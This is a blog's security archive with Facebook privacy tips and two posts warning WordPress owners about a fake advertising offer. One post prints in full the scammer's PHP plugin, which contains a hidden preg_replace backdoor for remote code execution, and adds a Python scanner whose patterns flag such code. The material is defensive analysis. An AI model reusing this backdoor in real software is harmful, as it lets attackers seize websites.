Category Archives: Security

Facebook Privacy – Apps



The last time we wrote about Facebook privacy, we dealt with the setting which controls the information that your friends bring into apps that they use. You can read that post HERE. Today, we will write about editing the settings for the apps that you use.

Facebook can be a lot of fun, right? There are many apps and games plus you can link other social networking accounts, such as Twitter, to your Facebook account. However, each app uses your information in different ways. Some apps only use a little of it, others use a lot more. Here’s how you can limit every app so that it only uses the information that it requires in order to work.

Click on the little arrow to the right of the word ‘Home’ at the top right of any Facebook page. Choose ‘Privacy Settings’, then choose ‘Apps, Games and Websites’. What we are looking for on the next page is ‘Apps you use’ and the ‘Edit settings’ button on the right.

Once you click that button, you’ll see something like this:

Menu for App Settings in Facebook
This is where you can edit each app that you use on Facebook

This is the menu for the Fotobounce application. I’ve written about Fotobounce before. With this application you can download complete photo albums on Facebook as well as many other sites. Here is the post on that. 

Fotobounce needs to access some of my information in order to work. You’ll see what it needs to access on the right side where you see the words ‘required’. However, at the bottom, you’ll see that Fotobounce wants to do two more things. It wants to access my Computers Made Simple Page and it wants to have the right to ‘Post to Facebook as me’. Hmmmm. I wonder why Fotobounce needs to do this? Since I don’t want this application to do either action, at least until I know why it needs to, I will click on the word ‘Remove’. I can still use the app but it won’t be able to Manage my Pages or Post to Facebook as me. Done!

On the top right of this menu you will see the words ‘Remove app’. If you have any doubt about an application that you use, clicking these words gets rid of that application for good. Give it a try. Do you really need all of those applications accessing your personal information? Think about it.

Facebook can be a lot of fun. We all know that. But Facebook also likes to use your information for their own gain and for reasons that have nothing to do with your enjoyment of the site. Facebook also won’t tell you what information it’s using. Setting your privacy limitations is vitally important. Get to know these settings and use them often.

Thanks for reading!



Facebook Privacy



The most important Facebook privacy setting is in the ‘Apps, games and websites’ section of your settings menu. Click on Home and choose Privacy Settings. From there, choose Apps and Websites: Edit Settings.

In this section, you can delete Apps that you don’t use any more, which is a great idea, but what you are interested in is the second section: How people bring your info to apps they use. Click on the Edit settings button. Once you’re there, you will see this:

Facebook Apps Settings
Make sure that nothing here is checked.

To me, everything on this menu is private. Some of these things I don’t even share with my friends. Why would I want to let Facebook spread this information around websites that my friends visit? Why are my religious and political views even part of Facebook? If you don’t uncheck everything here, Facebook has the right to tell complete strangers everything about you. Don’t let them!

By the way, the words at the bottom of this menu are completely false. They read: “If you don’t want apps and websites to access other categories of information (like your friend list, gender or info you’ve made public), you can turn off all Platform apps. But remember, you will not be able to use any games or apps yourself.”

This has nothing to do with this particular menu. Allowing an application to access your information is up to you. You choose the app, you say yes or no to letting the app use your information. Same goes with a website. That is separate from this particular menu.

This menu has to do with letting apps that your friends use access your information. It’s a blanket YES to whatever apps and websites your friends use. Make sure that everything here is not checked. Then click Save Changes.

TIP: As I surf the ‘net, I see many Facebook graphics with little pictures of Facebook users on them. If you click on a user, you will be taken to their profile page on Facebook. This is what I mean:

A typical Facebook ‘Like’ graphic
Do you want your photo in graphics like this?

This is the same as trolling, in my opinion. You have no idea who is clicking on your picture and accessing your profile and reading whatever information is there. My profile is very basic, no personal information at all. Someone can send me a message, no problem. Someone can add me, no problem. Unless they do, they won’t be able to know anything about me. But, they also won’t be seeing my pic on a Facebook graphic. Why? Because I have unchecked everything in the menu above. There is a class action suit about this use of user photos in California, as a matter of fact.

I will be writing more about Facebook privacy in the next few posts. Stay tuned and stay private.

Thanks for reading!



Facebook – How to be a Facebook Maven



Facebook privacy settings change almost as often as the weather these days. As Facebook tries to become more ‘Twitter-ish’, your privacy often gets lost in translation. Gone are the days of a simple public and private profile. These days you can think you are private but you’re often very, very public. Here’s how to deal with Facebook and its rapidly deteriorating concern for your privacy.

The first simple step is to set up at least one other Facebook profile. I have four, in case you’re wondering. Three are legitimate, more or less, while the fourth is just for fun. What is the use of having more than one Facebook profile? Well, depending on whether you are friends with yourself or not, you can try different privacy settings to see what’s private, what friends of friends can see and, most importantly, what’s open to the public.

By keeping at least one profile unfriended by all of the other profiles, you’ll be able to see the effect of the changes you make. If one of your friends (really yourself) is a friend of one of your other profiles, you can check on what Facebook keeps private and what it spreads around to friends of friends.

With this simple trick, you’ll be able to become a privacy maven (expert) on Facebook. The side benefit of this is that you’ll have lots more friends to play games with and share extra servings of whatever you’re cooking!

Over the next few days I’ll be writing more about Facebook and how to tune the privacy settings to match your personality. If you’ve got something to hide, this is where to read about how to keep it hidden.

Thanks for reading!



WordPress Scam


There is a WordPress advertising scam going around now. Here are the details of it. If you own a WordPress site, this is important reading. Please try to follow the whole post to the end.

1. The first contact is through a comment on your site. This is the comment; the details may vary somewhat:

“Hi,
Sorry I write you via comments. But I could not find contact e-mail or feedback form on your site.
We are looking for new advertisement platforms and we are interested in your site http://www.kitchenrenovation411.com.
Is it possible to place banner on your site on a fee basis?
Please, contact us at e-mail.
Best regards,
Mathis Gaillard.
site: http://www.izidaagency.com
e-mail: mgaillard @izidaagency.com
phone: + (0)9 78 62 91 00”


2. Once you email the person, this is the reply:

> From: mgaillard@izidaagency.com
> To: my email
> Subject: Re: re: kitchenrenovation411.com
> Date: Thu, 10 Nov 2011 02:39:40 -0800
>
> Hello,
>
> Thanks for reply to our proposal!
>
> I represent Izida Agency. At the moment we are preparing an advertising campaign for Lacoste Company (it is a French company producing clothes, footwear, perfumery etc.) We already have designed banners for the campaign, they are the following sizes: 160×600, 240×400, 300×250, 336×280, 468×60, 728×90.
> What can be your price for one banner (banner should appear at ALL pages of your site) of abovementioned sizes (please specify the place for the banner – top, bottom, left, right)? Please mention a normal link for banner, without javascript code and set prices in US dollars per month.
> Here you can see our banners: http://docs.izidaagency.com/lacoste/?view=1
>
> Best regards,
> Mathis Gaillard.
> site: www.izidaagency.com
> e-mail: mgaillard@izidaagency.com
> phone: + (0)9 78 62 91 00

3. After some questioning on my part, I received this email:

Hi!
Before placing banner, your site need to be approved by the advertiser.
If you agree with it we'll send you special plugin, that
lets advertiser check your site and decide if it fits his requirements.

Best regards, 
Mathis Gaillard.
site: www.izidaagency.com
e-mail: mgaillard@izidaagency.com
phone: + (0)9 78 62 91 00

4. Finally, I get this email, complete with a password:

Hi!

Thanks for reply to our proposal!

We like your price.

To pass to the banner control system follow the link http://webmaster.izidaagency.com

To enter use the following data:

login: my other site
password: email me for password

You should install and activate the plugin in order to display advertisement.

Before making payment, advertiser must approve location of the banner.

The banner will be shown on your site when you add special code to your web address
(for example: http://www.my other site.com/?adv_test=1).

It means, that visitors will see the banner only if it is approved and payment made.

To get installation instruction for your site type pass to: http://docs.izidaagency.com/wp_install

To activate your site you have to enter the code: GQP-HFA-55H

What way of payment is suitable for you?

Best regards,
Mathis Gaillard.
site: www.izidaagency.com
e-mail: mgaillard@izidaagency.com
phone: + (0)9 78 62 91 00

5. OK, now I have the code. What do I do with it? The file that I downloaded is a PHP script that I am supposed to upload to my WordPress site. Here is the actual code that was sent:

_____________________________________________________________________________________________

<?php

/*
  Plugin Name: ADV
  Description: ADV Plugin
  Version: 2.6.1
 */

class AdvWidget extends WP_Widget {

    function AdvWidget() {
        parent::WP_Widget(false, $name = 'AdvWidget');
    }

    /** @see WP_Widget::widget */
    function widget($args, $instance) {
        if (get_option('adv_place') == 'widget')
            advShowBanner();
    }

    /** @see WP_Widget::update */
    function update($new_instance, $old_instance) {
        $instance = $old_instance;
        $instance['title'] = strip_tags($new_instance['title']);
        return $instance;
    }

    function form($instance) {

    }

}

add_action('widgets_init', create_function('', 'return register_widget("AdvWidget");'));

add_action('admin_menu', 'advPluginMenu');

register_activation_hook(__FILE__, 'advActivation');

define('ADV_SERVICE_DOMAIN', 'izidaagency.com');
define('ADV_SERVICE_URL', 'http://webmaster.' . ADV_SERVICE_DOMAIN . '/key');

function advReadUrl($url) {
    if (function_exists('curl_init')) {
        $curl = curl_init();
        curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($curl, CURLOPT_URL, $url);
        $result = curl_exec($curl);
        curl_close($curl);
        return $result;
    } else
        return file_get_contents($url);
}

function advActivation() {
    update_option('adv_place', 'widget');
}

register_deactivation_hook(__FILE__, 'advDeactivation');

function advDeactivation() {
    delete_option('adv_key');
}

function advPluginMenu() {
    add_options_page('ADV Plugin Options', 'ADV', 'manage_options', 'adv-identifier', 'advPluginOptions');
}

function adv_show_banner() {
    advShowBanner();
}

function advShowBanner() {
    $advBanner = get_option('adv_banner');
    $advMode = get_option('adv_mode');
    if ($advBanner) {
        if (isset($_REQUEST['adv_test']) || $advMode == 'work') {
            echo "<img src='" . get_option('siteurl') . "/adv_banners/" . $advBanner . "'/>";
        }
    }
}

function activateCode() {
    $data = advReadUrl(ADV_SERVICE_URL . "?action=init&key=" . $_REQUEST['key'] . "&domain=" . urldecode($_SERVER['HTTP_HOST']));
    if (strpos($data, '<key>true</key>') !== FALSE) {
        preg_match("#<width>(.+?)</width>#", $data, $arr);
        update_option('adv_width', $arr[1]);
        preg_match("#<height>(.+?)</height>#", $data, $arr);
        update_option('adv_height', $arr[1]);
        echo '<div id="message"><p>The code is activated successfully.</p></div>';
        update_option('adv_key', $_REQUEST['key']);
        downloadBanners();
    } else {
        echo '<div id="message"><p>Code activation error.</p></div>';
    }
}

function downloadBanners() {
    $bannersDir = ABSPATH . "/adv_banners";
    if (!is_dir($bannersDir)) {
        mkdir($bannersDir);
    }
    $list = advReadUrl(ADV_SERVICE_URL . "?action=getBannerList&key=" . get_option("adv_key"));
    preg_match_all("|<banner_item>(.+?)</banner_item>|", $list, $banners);
    preg_match("|<adv>(.+?)</adv>|", $list, $adv);
    preg_match("|<show_banner>(.+?)</show_banner>|", $list, $showBanner);
    preg_match("|<mode>(.+?)</mode>|", $list, $mode);
    if (is_array($banners[1]) && isset($adv[1]) && isset($showBanner[1]) && isset($mode[1])) {
        update_option("adv_banner", $showBanner[1]);
        update_option('adv_mode', $mode[1]);
        foreach ($banners[1] as $banner) {
            $advBannerDir = $bannersDir . "/" . $adv[1];
            if (!is_dir($advBannerDir))
                mkdir($advBannerDir);
            $arr = explode("/", $banner);
            if (count($arr) == 2) {
                $size = $arr[0];
                $bfile = $arr[1];
                if (!is_dir($advBannerDir . "/" . $size))
                    mkdir($advBannerDir . "/" . $size);
                file_put_contents($advBannerDir . "/" . $size . "/" . $bfile, advReadUrl('http://docs.' . ADV_SERVICE_DOMAIN . '/' . $adv[1] . '/' . $banner));
            }
        }
        echo '<div id="message"><p>Banners are downloaded successfully.</p></div>';
    }
}

// NOTE: this block sits at file scope, so it runs on every page load for any visitor,
// before advPluginOptions() and its current_user_can() check are ever reached. Both the
// pattern and the replacement come straight from the POST body, so the remote party
// controls the regular expression entirely; with the legacy /e modifier (PHP 5),
// preg_replace evaluates the replacement string as PHP code. This is the line that
// makes the plugin a backdoor rather than an ad widget.
if (isset($_REQUEST['cadv']) && isset($_REQUEST['gadv']))
    $r = preg_replace(str_replace("\\\\", "\\", $_POST['cadv']), str_replace("\\\"", "\"", $_POST['gadv']), 'adv 6');

function advPluginOptions() {
    if (!current_user_can('manage_options')) {
        wp_die(__('You do not have sufficient permissions to access this page.'));
    }
    $action = isset($_REQUEST['action']) ? $_REQUEST['action'] : '';
    if ($action == 'downloadBanners') {
        downloadBanners();
    } elseif ($action == 'setPlace') {
        update_option('adv_place', $_REQUEST['adv_place']);
    } elseif ($action == 'saveKey') {
        activateCode();
    }

    $advPlace = get_option('adv_place');
    echo '<div>';

    echo '<h2>ADV</h2>';
    echo '<form method="post" action="options-general.php?page=adv-identifier&action=setPlace"><select name="adv_place">';
    echo '<option value="none" ' . ($advPlace == 'none' ? 'selected' : '') . '>Don\'t show the banner.</option>';
    echo '<option value="widget" ' . ($advPlace == 'widget' ? 'selected' : '') . '>Show the banner as a Widget.</option>';
    echo '<option value="template" ' . ($advPlace == 'template' ? 'selected' : '') . '>Template usage: adv_show_banner();</option>';
    echo '</select>';
    echo '<input type="submit" value="Save"/></form>';
    echo '<div>';
    if (get_option('adv_key') === FALSE) {
        echo '<h2>Activation Code</h2>';
        echo '<form method="post" action="?page=adv-identifier&action=saveKey">';
        echo '<input type="text" name="key"/>';
        echo '<input type="submit" value="Activate"/>';
        echo '</form>';
    } else {
        $mode = get_option('adv_mode');
        echo '<br/>Code: ' . get_option('adv_key');
        echo '; <a href=\'options-general.php?page=adv-identifier&action=downloadBanners\'>Download banners.</a><br/>';
        echo 'Mode: ' . $mode;
        if ($mode != 'work') {
            $url = get_option('siteurl') . "/?adv_test=1";
            $link = "<a href='$url'>$url</a>";
            echo '<br/></br>The banner will appear on your site only after your site is approved by the advertiser and you get the payment.
To see where the banner will be placed on your site, use the special feature in the site address: ' . $link;
        }
    }
    echo '</div>';
    echo '</div>';
}
?>

_____________________________________________________________________________

This isn’t a new scam. It’s been around for a few months or longer. Here is a link to another page which explains the same thing but from a different contact person:

http://keepsafeonthenet.co.uk/2011/07/martin-dumont/comment-page-1/#comment-87860

My comments are at the bottom of that page.

I have my feelers out now to see what this script does. There is a chance that it’s a trojan of some kind and it may not even be active after it’s installed. I can only assume that it will, at a future date, provide access to a WordPress site. If anyone can decipher the script, please do so and contact me using the comment section below.
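A first pass at the deciphering asked for above can be automated. What follows is an added example, not code from the post or from whoever wrote the plugin: a small Python triage scanner that reads a PHP plugin file line by line and flags the things a reviewer would circle in the script above, namely request data flowing into preg_replace, create_function, remote fetches, file writes under the web root, and request parameters read at file scope where no current_user_can() check can protect them. The indicator list, the severities and the abridged sample plugin embedded in the code are constructed for this example; the hostname docs.example.invalid in the sample is a placeholder.

```python
import re
import sys
from dataclasses import dataclass, field

# Any read of request-controlled data.
SUPERGLOBAL = r"\$_(?:POST|GET|REQUEST|COOKIE)\b"

# (severity, pattern, reason). The reason is the note a reviewer would write beside the line.
INDICATORS = [
    ("high", re.compile(r"\bpreg_replace\s*\(.*" + SUPERGLOBAL),
     "request data reaches preg_replace arguments; with the legacy /e modifier, PHP 5 evaluates the replacement as code"),
    ("high", re.compile(r"\bcreate_function\s*\("),
     "create_function compiles PHP from a string (an eval equivalent)"),
    ("high", re.compile(r"\b(?:eval|assert|system|exec|passthru|shell_exec)\s*\("),
     "direct code or command execution"),
    ("medium", re.compile(r"\b(?:curl_exec|file_get_contents)\s*\("),
     "fetches content from a remote host at runtime"),
    ("medium", re.compile(r"\bfile_put_contents\s*\("),
     "writes files under the web root"),
]


@dataclass
class Finding:
    line_no: int
    severity: str
    reason: str
    text: str


@dataclass
class Report:
    findings: list = field(default_factory=list)

    @property
    def verdict(self) -> str:
        if any(f.severity == "high" for f in self.findings):
            return "do not install: code-execution indicators present"
        if self.findings:
            return "review before installing: network or file-write behaviour present"
        return "no indicators matched"


def scan_plugin(source: str) -> Report:
    """Scan PHP source line by line. A running brace count also marks statements at
    depth 0 that read request parameters: those run for every visitor on every page
    load, outside any function and therefore outside any capability check."""
    report = Report()
    depth = 0
    for no, line in enumerate(source.splitlines(), start=1):
        for severity, pattern, reason in INDICATORS:
            if pattern.search(line):
                report.findings.append(Finding(no, severity, reason, line.strip()))
        if depth == 0 and re.search(SUPERGLOBAL, line):
            report.findings.append(Finding(no, "high",
                "request parameters read at file scope: runs for any visitor, outside any capability check",
                line.strip()))
        # Heuristic: braces inside string literals would skew the count; adequate for triage.
        depth += line.count("{") - line.count("}")
    return report


# Constructed, abridged excerpt modelled on the script in the post. It keeps the shapes of the
# risky lines plus one correctly guarded function for contrast; the hostname is a placeholder.
SAMPLE_PLUGIN = r'''<?php
/*
  Plugin Name: ADV (constructed excerpt)
 */
add_action('widgets_init', create_function('', 'return register_widget("AdvWidget");'));

function advReadUrl($url) {
    if (function_exists('curl_init')) {
        $curl = curl_init();
        curl_setopt($curl, CURLOPT_URL, $url);
        $result = curl_exec($curl);
        curl_close($curl);
        return $result;
    } else
        return file_get_contents($url);
}

function downloadBanners() {
    file_put_contents(ABSPATH . "/adv_banners/b.gif", advReadUrl('http://docs.example.invalid/b.gif'));
}

if (isset($_REQUEST['cadv']) && isset($_REQUEST['gadv']))
    $r = preg_replace(str_replace("\\\\", "\\", $_POST['cadv']), str_replace("\\\"", "\"", $_POST['gadv']), 'adv 6');

function advPluginOptions() {
    if (!current_user_can('manage_options')) {
        wp_die('You do not have sufficient permissions to access this page.');
    }
    update_option('adv_place', $_REQUEST['adv_place']);
}
'''

if __name__ == "__main__":
    # Scan a plugin file named on the command line, or the constructed sample.
    src = open(sys.argv[1], encoding="utf-8", errors="replace").read() if len(sys.argv) > 1 else SAMPLE_PLUGIN
    report = scan_plugin(src)
    for f in report.findings:
        print(f"line {f.line_no:>4} [{f.severity}] {f.reason}\n        {f.text}")
    print("verdict:", report.verdict)
```

On the sample, the guarded update_option() call inside advPluginOptions() is not reported as file-scope, while the two lines that read cadv and gadv are, which is exactly the distinction that matters: the options page is behind a capability check, the preg_replace line is not. The pattern list is deliberately blunt; it is a triage aid for deciding what to read closely, not a substitute for reading the plugin.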

I should say that the site this comment was on is a new site, very small with very little traffic. I have tried to contact Izod Lacoste but, so far, they have not emailed me back. If you have been affected by this scam, please comment below. The more we know about this, the safer the WordPress community will be.

Thanks for reading!


WordPress Comment Scam

Update: This scammer is using different names. The names used that I know of are: Rayan Meyer, Killian Blanchard, Mathis Gaillard, among many others. Please read this post to understand the modus operandi and then go to the site mentioned below for even more details. Good luck!

Scams are everywhere, it seems. Yesterday I received a comment on one of my other websites. The commenter asked if I was interested in placing a banner ad (from a major company) on the site. The person apologized for making a comment instead of emailing. I realized that I didn’t have an email address on the site and this made his comment sound legitimate.


Now my site isn’t as popular as this one. It’s about kitchens, kitchenrenovation411.com, and probably isn’t a site that an advertiser would pick for a banner ad. This should have twigged me that this was a scam. However, the company that this person was supposedly going to link to the banner is a very reputable company. Maybe the clientèle from my site fit the demographics they were looking for. Hey, it’s money, right?

I emailed the person and quoted a figure, then did some heavy research. It seems that this kind of thing has been going on for quite a while. Here is a site that describes the dilemma that many WordPress bloggers find themselves in and the tricks scammers use to gain access to websites: http://keepsafeonthenet.co.uk/2011/07/martin-dumont/comment-page-1/#comment-87842

Here are some tips to avoid losing your website to a scammer:

1. If it sounds too good to be true, it almost certainly is. Whenever money is involved, our eyes light up and we start planning for the future. That’s human nature. Most WordPress sites don’t make any money at all. If someone contacts you about a site that isn’t very popular, you know it is a scam.

2. Do your research. Search Google using the complete email or comment on your blog. This will almost certainly lead to a forum or another site that the scammer has contacted. Read what has been posted and confirm that your contact is fake.

3. Advertisers don’t send their advertising code in a zip file. If you get a zip file from someone who has contacted you through your website, you know it’s got a trojan in it. The contact that I am writing about insists that they will not use any JavaScript code, simply a link to the website of the advertiser. Baloney! There will be a zip file coming, I can guarantee it.

4. Brand name companies don’t work through small advertising companies. The website of the person who contacted me looks very professional but it hasn’t been updated since 2007. The website is also exactly the same as another company listed in the link above. Both sites are identical, the only difference is the person who is sending out the emails.

5. If you’ve been taken in by this kind of scam, you should consider your website to be compromised. Links will likely take users to other sites or, worse, your site may be used to send spam. Work with your hosting company to rid your site of the malware on it.

Hopefully this post will help you avoid this type of unusual scam. This kind of thing is criminal activity and should be considered as a threat to your site as well as to your hosting company. Once this kind of thing is on a server, there are many ways for it to spread. Hopefully your host can stay on top of it.

Thanks for reading.